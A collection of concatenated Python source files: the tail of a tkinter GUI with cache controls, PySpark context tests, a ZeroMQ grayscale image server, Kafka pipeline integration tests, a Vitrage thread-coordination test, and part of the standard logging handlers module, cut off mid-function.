frame_cachebuttons.config(relief = RIDGE, borderwidth = 2)
# Print Cache Button
button_cache = ttk.Button(frame_cachebuttons,
text = "Print Cache",
command = lambda: self.handleButtonPress('__print_cache__'),
width = 20)
button_cache.grid(row=1, column=3, sticky='w', padx=5, pady=5)
# Clear Cache Button
self.button_clear_cache = ttk.Button(
frame_cachebuttons,
text = "Clear Cache",
command = lambda: self.handleButtonPress('__clear_cache__'),
width = 20)
self.button_clear_cache.grid(row=1, column=4, sticky='w', padx=5, pady=5)
# Checkbutton Use Cache File
self.useCacheFile = IntVar()
self.useCacheFile.set(1)
self.cb_useCacheFile = Checkbutton(
frame_cachebuttons,
text="Use File Cache:",
justify=LEFT,
variable = self.useCacheFile,
onvalue=1,
offvalue=0)
self.cb_useCacheFile.grid(row=1, column=1, sticky='w', padx=3, pady=3)
# Select Cache file button
self.CacheFileButtonText = StringVar()
self.CacheFileButtonText.set(DEFAULT_CACHE_FILE)
self.button_select_cache_button = ttk.Button(
frame_cachebuttons,
textvariable = self.CacheFileButtonText,
command = lambda: self.handleButtonPress('__select_cache_file__'))
self.button_select_cache_button.grid(row=1, column=2, sticky='w', padx=3, pady=3)
#if self.useCacheFile.get() == 1: # Use Cache File
# self.button_clear_cache.state(["disabled"])
# self.button_clear_cache.config(state=DISABLED)
# else:
# self.button_clear_cache.state(["!disabled"])
# self.button_clear_cache.config(state=not DISABLED)
self.root.mainloop()
def exit_handler():
logging.getLogger().info("==== epsig2_gui STOPPED/INTERRUPTED: " + str(datetime.now()) + " by: " + getpass.getuser() + " ====")
def main():
app = None
logging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s- %(message)s')
atexit.register(exit_handler)
try:
# app = epsig2_gui()
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future = executor.submit(epsig2_gui())
except KeyboardInterrupt:
logging.debug("Program Exiting.")
app.root.quit()
sys.exit(0)
if __name__ == "__main__": main()
|
test_context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import stat
import tempfile
import threading
import time
import unittest
from collections import namedtuple
from pyspark import SparkConf, SparkFiles, SparkContext
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest, SPARK_HOME
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class LocalCheckpointTests(ReusedPySparkTestCase):
def test_basic_localcheckpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertFalse(flatMappedRDD.isLocallyCheckpointed())
flatMappedRDD.localCheckpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.isLocallyCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_file_recursively_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello")
self.sc.addFile(path, True)
download_path = SparkFiles.get("hello")
self.assertNotEqual(path, download_path)
with open(download_path + "/hello.txt") as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
with open(download_path + "/sub_hello/sub_hello.txt") as test_file:
self.assertEqual("Sub Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
self.assertTrue(SparkContext.getOrCreate() is sc)
def test_parallelize_eager_cleanup(self):
with SparkContext() as sc:
temp_files = os.listdir(sc._temp_dir)
rdd = sc.parallelize([0, 1, 2])
post_parallalize_temp_files = os.listdir(sc._temp_dir)
self.assertEqual(temp_files, post_parallalize_temp_files)
def test_set_conf(self):
# This is for an internal use case. When there is an existing SparkContext,
# SparkSession's builder needs to set configs into SparkContext's conf.
sc = SparkContext()
sc._conf.set("spark.test.SPARK16224", "SPARK16224")
self.assertEqual(sc._jsc.sc().conf().get("spark.test.SPARK16224"), "SPARK16224")
sc.stop()
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
# When thread is pinned, job group should be set for each thread for now.
# Local properties seem not being inherited like Scala side does.
if os.environ.get("PYSPARK_PIN_THREAD", "false").lower() == "true":
sc.setJobGroup('test_progress_api', '', True)
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
def test_forbid_insecure_gateway(self):
# Fail immediately if you try to create a SparkContext
# with an insecure gateway
parameters = namedtuple('MockGatewayParameters', 'auth_token')(None)
mock_insecure_gateway = namedtuple('MockJavaGateway', 'gateway_parameters')(parameters)
with self.assertRaises(ValueError) as context:
SparkContext(gateway=mock_insecure_gateway)
self.assertIn("insecure Py4j gateway", str(context.exception))
def test_resources(self):
"""Test the resources are empty by default."""
with SparkContext() as sc:
resources = sc.resources
self.assertEqual(len(resources), 0)
def test_disallow_to_create_spark_context_in_executors(self):
# SPARK-32160: SparkContext should not be created in executors.
with SparkContext("local-cluster[3, 1, 1024]") as sc:
with self.assertRaises(Exception) as context:
sc.range(2).foreach(lambda _: SparkContext())
self.assertIn("SparkContext should only be created and accessed on the driver.",
str(context.exception))
class ContextTestsWithResources(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
self.tempFile = tempfile.NamedTemporaryFile(delete=False)
self.tempFile.write(b'echo {\\"name\\": \\"gpu\\", \\"addresses\\": [\\"0\\"]}')
self.tempFile.close()
os.chmod(self.tempFile.name, stat.S_IRWXU | stat.S_IXGRP | stat.S_IRGRP |
stat.S_IROTH | stat.S_IXOTH)
conf = SparkConf().set("spark.test.home", SPARK_HOME)
conf = conf.set("spark.driver.resource.gpu.amount", "1")
conf = conf.set("spark.driver.resource.gpu.discoveryScript", self.tempFile.name)
self.sc = SparkContext('local-cluster[2,1,1024]', class_name, conf=conf)
def test_resources(self):
"""Test the resources are available."""
resources = self.sc.resources
self.assertEqual(len(resources), 1)
self.assertTrue('gpu' in resources)
self.assertEqual(resources['gpu'].name, 'gpu')
self.assertEqual(resources['gpu'].addresses, ['0'])
def tearDown(self):
os.unlink(self.tempFile.name)
self.sc.stop()
if __name__ == "__main__":
from pyspark.tests.test_context import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
server.py
|
import base64
import cv2
import zmq
import numpy as np
import threading
def face_model_fit(id):
# todo 얼굴 학습되게 코드 넣기
print("fit :", id)
def process(recv_socket):
while True:
frame = recv_socket.recv_string()
data = frame.split(":")
header = data[0]
if header == "fit":
id = data[1]
face_model_fit(id)
def face_model(recv_socket, send_socket):
while True:
frame = recv_socket.recv_string()
img = base64.b64decode(frame)
np_img = np.frombuffer(img, dtype=np.uint8)
source = cv2.imdecode(np_img, 1)
# todo 모델 코드 작성 (현재는 흑백으로 변환되게 해둠)
gray_frame = cv2.cvtColor(source, cv2.COLOR_BGR2GRAY)
encoded, buffer = cv2.imencode(".jpg", gray_frame)
jpg_as_text = base64.b64encode(buffer)
send_socket.send(jpg_as_text)
context = zmq.Context()
send_socket = context.socket(zmq.PUB)
send_socket.bind("tcp://*:5000")
recv_socket = context.socket(zmq.SUB)
recv_socket.connect("tcp://192.168.0.14:4000") # 라즈베리파이 ip
recv_socket.setsockopt_string(zmq.SUBSCRIBE, np.compat.unicode(""))
recv_socket2 = context.socket(zmq.SUB)
recv_socket2.connect("tcp://localhost:6000")
recv_socket2.setsockopt_string(zmq.SUBSCRIBE, np.compat.unicode(""))
face_model_thread = threading.Thread(target=face_model, args=(recv_socket, send_socket))
process_thread = threading.Thread(target=process, args=(recv_socket2,))
face_model_thread.start()
process_thread.start()
|
test_integration_input_app_output.py
|
import datetime
import threading
import pytest
import os
import time
from dotenv import load_dotenv
from agogosml.common.kafka_streaming_client import KafkaStreamingClient
from agogosml.reader.input_reader_factory import InputReaderFactory
from agogosml.writer.output_writer_factory import OutputWriterFactory
from tests.client_mocks import StreamingClientMock, HttpClientMock
from tests.integration_tests.test_app import TestApp
load_dotenv()
@pytest.fixture
def mock_streaming_client():
return StreamingClientMock()
@pytest.fixture
def mock_listener_client():
return HttpClientMock({'PORT': 0})
@pytest.mark.integration
def test_when_messages_received_in_input_then_all_messages_are_sent_via_output():
"""
This function tests the integration of input and output.
It assumes connectivity to streaming client is correct, therefore the steaming client is mocked.
We look to find that once a message is received, it is send out by the output writer.
This is the maximal integration test we can have in an isolated environment.
:return:
"""
# setup input
input_client_mock = StreamingClientMock()
ir_config = {
'APP_PORT': os.getenv("APP_PORT"),
'APP_HOST': os.getenv("APP_HOST"),
}
print('Creating reader')
ir = InputReaderFactory.create(ir_config, input_client_mock)
print('start_receiving_messages')
ir.start_receiving_messages()
# setup app
app = TestApp(os.getenv("APP_PORT"),
os.getenv("APP_HOST"),
os.getenv("OUTPUT_WRITER_PORT"),
os.getenv("OUTPUT_WRITER_HOST"))
app.start()
# setup output
ow_config = {
'OUTPUT_WRITER_PORT': os.getenv("OUTPUT_WRITER_PORT"),
'OUTPUT_WRITER_HOST': os.getenv("OUTPUT_WRITER_HOST"),
}
print('Creating writer')
output_client_mock = StreamingClientMock()
ow = OutputWriterFactory.create(ow_config, output_client_mock, None)
print('start_incoming_messages')
ow.start_incoming_messages()
print('sending test message to reader')
test_msg = str(time.clock())
# send a message from INPUT reader, and expect it to flow in the pipeline,
# and eventually be picked up by the output writer
input_client_mock.fake_incoming_message_from_streaming(test_msg)
last_msg = output_client_mock.get_last_msg()
assert last_msg == test_msg
ir.stop_incoming_messages()
ow.stop_incoming_messages()
@pytest.mark.integration
def test_when_error_in_output_then_pipeline_fails():
"""
This function tests the integration of input and output.
It assumes connectivity to streaming client is correct, therefore the steaming client is mocked.
We look to find that once a message is received, it is send out by the output writer.
This is the maximal integration test we can have in an isolated environment.
:return:
"""
# setup input
input_client_mock = StreamingClientMock()
ir_config = {
'APP_PORT': os.getenv("APP_PORT"),
'APP_HOST': os.getenv("APP_HOST"),
}
print('Creating reader')
ir = InputReaderFactory.create(ir_config, input_client_mock)
print('start_receiving_messages')
ir.start_receiving_messages()
# setup app
app = TestApp(os.getenv("APP_PORT"),
os.getenv("APP_HOST"),
os.getenv("OUTPUT_WRITER_PORT"),
os.getenv("OUTPUT_WRITER_HOST"))
app.start()
# setup output
ow_config = {
'OUTPUT_WRITER_PORT': os.getenv("OUTPUT_WRITER_PORT"),
'OUTPUT_WRITER_HOST': os.getenv("OUTPUT_WRITER_HOST"),
}
print('Creating writer')
output_client_mock = StreamingClientMock()
ow = OutputWriterFactory.create(ow_config, output_client_mock, None)
print('start_incoming_messages')
# Set to fail on Output Send:
output_client_mock.set_fail_send(True)
print('sending test message to reader')
test_msg = str(time.clock())
# send a message from INPUT reader, and expect it to flow in the pipeline,
# and eventually be picked up by the output writer
result = input_client_mock.fake_incoming_message_from_streaming(test_msg)
last_msg = output_client_mock.get_last_msg()
assert last_msg is None
assert result is False
ir.stop_incoming_messages()
ow.stop_incoming_messages()
@pytest.mark.integration
def test_when_messages_sent_to_kafka_then_all_messages_are_sent_via_output():
"""
This function tests the integration of input and output.
It assumes connectivity to streaming client is correct, therefore the steaming client is mocked.
We look to find that once a message is received, it is send out by the output writer.
This is the maximal integration test we can have in an isolated environment.
Please allow KAFKA_TIMEOUT of 30 seconds or more
:return:
"""
# setup input
ir_config = {
'client': {
'type': 'kafka',
'config': {
"KAFKA_TOPIC": os.getenv("KAFKA_TOPIC_INPUT"),
"KAFKA_CONSUMER_GROUP": os.getenv("KAFKA_CONSUMER_GROUP"),
"KAFKA_ADDRESS": os.getenv("KAFKA_ADDRESS"),
"TIMEOUT": os.getenv("KAFKA_TIMEOUT"),
"EVENT_HUB_KAFKA_CONNECTION_STRING": os.getenv('EVENT_HUB_KAFKA_CONNECTION_STRING')
}
},
'APP_PORT': os.getenv("APP_PORT"),
'APP_HOST': os.getenv("APP_HOST"),
}
print('Creating reader')
ir = InputReaderFactory.create(ir_config)
# setup app
app = TestApp(os.getenv("APP_PORT"),
os.getenv("APP_HOST"),
os.getenv("OUTPUT_WRITER_PORT"),
os.getenv("OUTPUT_WRITER_HOST"))
app.start()
# setup output
ow_config = {
'client': {
'type': 'kafka',
'config': {
"KAFKA_TOPIC": os.getenv("KAFKA_TOPIC_OUTPUT"),
"KAFKA_ADDRESS": os.getenv("KAFKA_ADDRESS"),
"TIMEOUT": os.getenv("KAFKA_TIMEOUT"),
'EVENT_HUB_KAFKA_CONNECTION_STRING': os.getenv('EVENT_HUB_KAFKA_CONNECTION_STRING')
}
},
'OUTPUT_WRITER_PORT': os.getenv("OUTPUT_WRITER_PORT"),
'OUTPUT_WRITER_HOST': os.getenv("OUTPUT_WRITER_HOST"),
}
print('Creating writer')
ow = OutputWriterFactory.create(ow_config, None, None)
print('start_incoming_messages')
ow.start_incoming_messages()
print('start_receiving_messages')
# ir.start_receiving_messages()
t_ir = threading.Thread(name='testir', target=ir.start_receiving_messages)
t_ir.setDaemon(True)
t_ir.start()
print('sending test message to reader')
test_msg = str(time.clock())
print("sending %s to input topic" % test_msg)
# send a message from INPUT reader, and expect it to flow in the pipeline,
# and eventually be picked up by the output writer
send_message_to_kafka(test_msg)
last_msg = read_message_from_kafka()
print("received %s from output topic" % last_msg)
assert last_msg == test_msg
ir.stop_incoming_messages()
ow.stop_incoming_messages()
def send_message_to_kafka(msg):
config = {
"KAFKA_TOPIC": os.getenv("KAFKA_TOPIC_OUTPUT"),
"KAFKA_ADDRESS": os.getenv("KAFKA_ADDRESS"),
"TIMEOUT": os.getenv("KAFKA_TIMEOUT"),
"EVENT_HUB_KAFKA_CONNECTION_STRING": os.getenv('EVENT_HUB_KAFKA_CONNECTION_STRING')
}
kafka = KafkaStreamingClient(config)
val = kafka.send(msg)
return val
def read_message_from_kafka():
config = {
"KAFKA_TOPIC": os.getenv("KAFKA_TOPIC_INPUT"),
"KAFKA_ADDRESS": os.getenv("KAFKA_ADDRESS"),
"KAFKA_CONSUMER_GROUP": os.getenv("KAFKA_CONSUMER_GROUP"),
"TIMEOUT": os.getenv("KAFKA_TIMEOUT"),
"EVENT_HUB_KAFKA_CONNECTION_STRING": os.getenv('EVENT_HUB_KAFKA_CONNECTION_STRING')
}
kafka = KafkaStreamingClient(config)
kafka.start_receiving(on_msg)
start = datetime.datetime.now()
timeout = int(os.getenv("KAFKA_TIMEOUT"))
stop = False
msg = None
while not stop:
# Stop loop after timeout if exists
elapsed = datetime.datetime.now() - start
if elapsed.seconds >= timeout:
stop = True
# Poll messages from topic
if my_msg is not None:
stop = True
msg = my_msg
return msg
my_msg = None
def on_msg(msg):
global my_msg
my_msg = msg.decode('utf-8')
|
test_processor_service.py
|
# Copyright 2017 - Nokia
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
from vitrage.entity_graph.graph_init import EventsCoordination
from vitrage.tests import base
class EventsCoordinationTest(base.BaseTest):
@classmethod
def setUpClass(cls):
super(EventsCoordinationTest, cls).setUpClass()
cls.calc_result = 0
def do_work(self, x):
if x:
self.calc_result = self.calc_result * 2
else:
self.calc_result = self.calc_result + 1
def test_queue_coordination(self):
explain = """
initially calc_result is 0.
each high priority call multiplies by *2
each low priority call adds +1
so, if all the high calls are performed first, and then all the low,
the result should be the number of low priority calls.
0*(2^n) + 1*n
"""
priority_listener = EventsCoordination(None, self.do_work)
def write_high():
for i in range(10000):
priority_listener._do_high_priority_work(True)
def write_low():
for i in range(10000):
priority_listener._do_low_priority_work(False)
self.calc_result = 0
t1 = threading.Thread(name='high_1', target=write_high)
t2 = threading.Thread(name='high_2', target=write_high)
t3 = threading.Thread(name='low_1', target=write_low)
t4 = threading.Thread(name='low_2', target=write_low)
self._start_and_join(t1, t2, t3, t4)
self.assertEqual(20000, self.calc_result, explain)
self.calc_result = 0
t1 = threading.Thread(name='high_1', target=write_high)
t2 = threading.Thread(name='low_1', target=write_low)
t3 = threading.Thread(name='low_2', target=write_low)
t4 = threading.Thread(name='high_2', target=write_high)
self._start_and_join(t1, t2, t3, t4)
self.assertEqual(20000, self.calc_result, explain)
def _start_and_join(self, *args):
for t in args:
t.start()
for t in args:
t.join()
|
handlers.py
|
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
try:
import threading
except ImportError:
threading = None
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0,
encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename('%s.%d' % (self.baseFilename, i))
dfn = self.rotation_filename('%s.%d' % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + '.1')
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None:
self.stream = self._open()
if self.maxBytes > 0:
msg = '%s\n' % self.format(record)
self.stream.seek(0, 2)
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0,
encoding=None, delay=False, utc=False, atTime=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
if self.when == 'S':
self.interval = 1
self.suffix = '%Y-%m-%d_%H-%M-%S'
self.extMatch = (
'^\\d{4}-\\d{2}-\\d{2}_\\d{2}-\\d{2}-\\d{2}(\\.\\w+)?$')
elif self.when == 'M':
self.interval = 60
self.suffix = '%Y-%m-%d_%H-%M'
self.extMatch = '^\\d{4}-\\d{2}-\\d{2}_\\d{2}-\\d{2}(\\.\\w+)?$'
elif self.when == 'H':
self.interval = 60 * 60
self.suffix = '%Y-%m-%d_%H'
self.extMatch = '^\\d{4}-\\d{2}-\\d{2}_\\d{2}(\\.\\w+)?$'
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24
self.suffix = '%Y-%m-%d'
self.extMatch = '^\\d{4}-\\d{2}-\\d{2}(\\.\\w+)?$'
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7
if len(self.when) != 2:
raise ValueError(
'You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s'
% self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError(
'Invalid day specified for weekly rollover: %s' % self.when
)
self.dayOfWeek = int(self.when[1])
self.suffix = '%Y-%m-%d'
self.extMatch = '^\\d{4}-\\d{2}-\\d{2}(\\.\\w+)?$'
else:
raise ValueError('Invalid rollover interval specified: %s' %
self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = (self.atTime.hour * 60 + self.atTime.minute
) * 60 + self.atTime.second
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
if self.when.startswith('W'):
day = currentDay
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + daysToWait * (60 * 60 * 24)
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow:
addend = -3600
else:
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + '.'
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
